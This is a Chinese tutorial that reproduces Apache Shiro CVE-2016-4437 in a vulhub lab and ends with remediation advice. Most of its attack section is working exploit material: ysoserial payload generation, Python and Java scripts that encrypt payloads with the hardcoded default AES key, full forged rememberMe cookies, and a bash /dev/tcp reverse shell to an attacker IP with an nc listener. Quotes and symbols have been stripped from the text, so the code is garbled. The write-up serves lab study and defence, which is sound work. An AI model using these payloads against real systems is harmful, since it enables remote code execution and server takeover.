Apache Shiro 1.2.4 反序列化漏洞Shiro-550CVE-2016-4437一、漏洞简介1、Apache ShiroApache Shiro是一款开源安全框架提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用同时也能提供健壮的安全性。2、影响范围Apache Shiro ≤ 1.2.4所有版本包括1.2.4、1.2.3、1.2.2、1.2.1、1.2.0、1.1.x、1.0.x 等修复版本1.2.5 及以上含 1.3.x、1.4.x、1.5.x、1.6.x、1.7.x、1.8.x、2.x3、漏洞原理Shiro 1.2.4 及以下版本记住我功能使用固定硬编码 AES 密钥且对 Cookie 里的 rememberMe 数据直接解密反序列化无校验攻击者利用默认密钥构造恶意序列化载荷即可远程代码执行。二、环境准备1、搭建靶机# 进入目录[rootlocalhost vulhub]# cd shiro# 查看目录[rootlocalhost shiro]# lsCVE-2010-3863 CVE-2016-4437 CVE-2020-1957# 进入目录[rootlocalhost shiro]# cd CVE-2016-4437/# 搭建环境[rootlocalhost CVE-2016-4437]# docker compose up -d# 查看容器[rootlocalhost CVE-2016-4437]# docker ps2、下载ysoserial# 通过代理下载ysoserial┌──(root㉿kali)-[~]└─# proxychains wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial-all.jar# 查看┌──(root㉿kali)-[~]└─# lsDesktop Documents Downloads EHole Music Pictures Public Templates Videos ysoserial-0.0.6-all.jar# 测试是否能正常使用┌──(root㉿kali)-[~]└─# java -jar ysoserial-all.jar找了半天下载地址3、ACE加密脚本python版本importbase64fromCrypto.CipherimportAES# 读取生成的 poc.binwithopen(poc.bin,rb)asf:payloadf.read()# Shiro 默认密钥keybase64.b64decode(kPHbIxk5D2deZiIxcaaaA)# 生成随机IVivAES.new(key,AES.MODE_CBC).iv# PKCS7 填充defpad(s):bsAES.block_sizereturns(bs-len(s)%bs)*bytes([bs-len(s)%bs])# 加密payloadpad(payload)encryptedAES.new(key,AES.MODE_CBC,iv).encrypt(payload)# 输出最终 rememberMeresultbase64.b64encode(ivencrypted).decode()print(rememberMeresult)JAVA版本package org.vulhub.shirodemo; import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.codec.CodecSupport; import org.apache.shiro.util.ByteSource; import org.apache.shiro.codec.Base64; import org.apache.shiro.io.DefaultSerializer; import java.nio.file.FileSystems; import java.nio.file.Files; import java.nio.file.Paths; public class TestRemember { public static void main(String[] args) throws Exception { byte[] payloads Files.readAllBytes(FileSystems.getDefault().getPath(/path, to, poc.ser)); AesCipherService aes new AesCipherService(); byte[] key Base64.decode(CodecSupport.toBytes(kPHbIxk5D2deZiIxcaaaA)); ByteSource ciphertext aes.encrypt(payloads, key); System.out.printf(ciphertext.toString()); } }4、生成POC这里说一下因为kali的JDK是21版本的而需要JDK8才能兼容ysoserial如果你没有使用JDK8去运行就会出现我下面的问题# 生成POC┌──(root㉿kali)-[~]└─# java -jar ysoserial-all.jar CommonsBeanutils1 touch /tmp/success poc.bin# 在kali源里下载JDK8(源里没有所以只能去官方下载了)┌──(root㉿kali)-[~]└─# apt install openjdk-8-jdk# 用 Adoptium 官方 API 直链┌──(root㉿kali)-[~]└─# proxychains wget -O jdk8.tar.gz \https://api.adoptium.net/v3/binary/latest/8/ga/linux/x64/jdk/hotspot/normal/eclipse# 解压┌──(root㉿kali)-[~]└─# tar -xvf jdk8.tar.gz# 转移┌──(root㉿kali)-[~]└─# mv jdk8u492-b09 /opt/jdk8# 加别名┌──(root㉿kali)-[~]└─# alias java8/opt/jdk8/bin/java# POC生成┌──(root㉿kali)-[~]└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 touch /tmp/success poc.bin三、漏洞复现1、访问主页2、生成rememberMe# 生成rememberMe ┌──(root㉿kali)-[~] └─# python shiro_exp.py # 安装pycryptodome库 ┌──(root㉿kali)-[~] └─# pip3 install pycryptodome # 新版 Kali 的系统保护机制不让直接装 pip 包所以要使用参数来下载 ┌──(root㉿kali)-[~] └─# pip3 install pycryptodome --break-system-packages┌──(root㉿kali)-[~]└─# python shiro_exp.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、发包攻击先去容器里面看一下是否有success文件# 查看容器[rootlocalhost ~]# docker ps# 查看容器tmp目录[rootlocalhost ~]# docker exec 02fbc4cedb3d ls -la /tmp再次查看tmp目录发现已经创建了文件攻击成功4、反弹shell# tcp的反弹shell案例bash-i/dev/tcp/172.18.3.12/888801/bin/bash-i/dev/tcp/172.18.3.12/8888021bash-c{echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDAJjE}|{base64,-d}|{bash,-i}# 生成反弹shell┌──(root㉿kali)-[~]└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDAJjE}|{base64,-d}|{bash,-i} shell.ser# 替换py脚本中的字符串┌──(root㉿kali)-[~]└─# sed -i s/poc.bin/shell.ser/g shiro_exp.py# 生成rememberMe┌──(root㉿kali)-[~]└─# python shiro_exp.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监听kali端口8888并且发包查看是否控制┌──(root㉿kali)-[~]└─# nc -lvnp 8888listening on[any]8888...四、其他方式复现1、shiro反序列化在攻击主机打开shiro反序列化利用工具选择漏洞类型为shiro550地址栏中填入对应的地址http://192.168.88.130这里我重新搭建的环境这是IP地址不一样环境其他的都一样2、DNS外带漏洞检测CEYE是一个用于检测带外数据Out-of-Band的监控平台例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息例如SSRF/ XXE/ RCE等这里如果dnslog没有检测出来换成ceye来检测,两个都不太稳定3、利用链成功4、反弹Shell#监听8000端口[rootCentOS7 ~]# nc -lvp 8000#查看权限root1d7284f53b38:/# id#查看IProot1d7284f53b38:/# ip add到这里就已经攻击成功了补充说明一下Shiro 密钥可能是默认的也可能是其他的所以和爆破差不多的原理可以专门去收集或者或者下载密钥也不只是只有这一个工具使用比如kali上就可以安装ShiroAttack2、shiro-exploit等你也可以自己写python脚本五、修复建议1、漏洞成因Shiro 默认硬编码 AES 密钥kPHbIxk5D2deZiIxcaaaA公开泄露采用 CBC 模式 存在反序列化漏洞攻击者可构造恶意rememberMeCookie触发反序列化 RCE。2、主要修复禁止使用默认密钥重新生成高强度随机 Base64 密钥配置到shiro.ini/yml 中升级到1.2.7 及以上推荐 1.3.x/ 2.x 稳定版业务不需要就直接关闭rememberMe从根源杜绝漏洞利用。3、运维防护WAF 加规则拦截rememberMe超长恶意 Cookie、特征 payload定期扫描资产检测是否存在 Shiro 指纹 默认密钥服务器最小权限运行降低 RCE 后的危害范围限制外网访问后台管理接口六、参考文献Shiro反序列化漏洞详细分析https://www.anquanke.com/post/id/228889Shiro反序列化分析带思路及组件检测笔记https://xz.aliyun.com/t/8997Shiro介绍及主要流程https://www.cnblogs.com/insaneXs/p/10999384.htmlhttps://github.com/vulhub/vulhub/blob/master/shiro/CVE-2016-4437/README.zh-cn.md